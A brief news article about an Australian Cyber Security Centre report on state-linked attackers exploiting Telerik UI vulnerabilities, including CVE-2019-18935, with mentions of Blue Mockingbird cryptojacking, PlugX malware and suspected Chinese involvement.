A 48-pages report by Australian Cyber Security Center (ACSC) published on June 24, notified that a group of ‘state actors’ entered into the Australian network to manipulate the vulnerabilities related to cryptojacking malware attacks.
According to the report, the actors actually have manipulated four vulnerabilities in Terelik UI which include CVE-2019-18935.
Blue Mockingbird Uses Terelik UI Vulnerability
It is to be noted that recently, the Blue Mockingbird malware gang has used the CVE-2019-18935 to damage the systems using Monero mining software.
It is yet to be confirmed whether the hackers were able to install the cryptojacking malware when they attacked the network. The cybercriminals mostly use this kind of malware as it allows to install crypto-mining applications within the corporate network.
The CVE-2019-18935 vulnerability is a bit similar to the attack of Blue Mockingbird, but that does not mean that the Mockingbird was the part of the recent cyberattack in Australia.
The ACSC identified the mostly manipulated or damaged payload because the threat actors failed at the reverse shell. The identified ones are the payloads which tried to execute a Power Shell reverse shell; payload tryings to execute certutil.exe so that it could download another payload; payload that executed binary malware; and a payload that calculator the absolute path of the webroot.
PlugX Malware Also Used To Exploit Australian Network
The report further mentioned that one of the malware the Australian government found was PlugX, which is used by the group of Chinese hackers who supposedly, are connected with the Government of China.
According to Australian officials, there are great chances of China being behind this cyberattack because, since a long time, the diplomatic issue between the two countries is rising.
The officials have suggested that this attack could have taken place because earlier, the Australian Government called for an investigation on COVID-19’s origin, but the dragon national officials were not happy with it.
The Chinese officials stated that this investigation was a discriminatory accusation and reacted with trade retaliation.
Articles You May Read.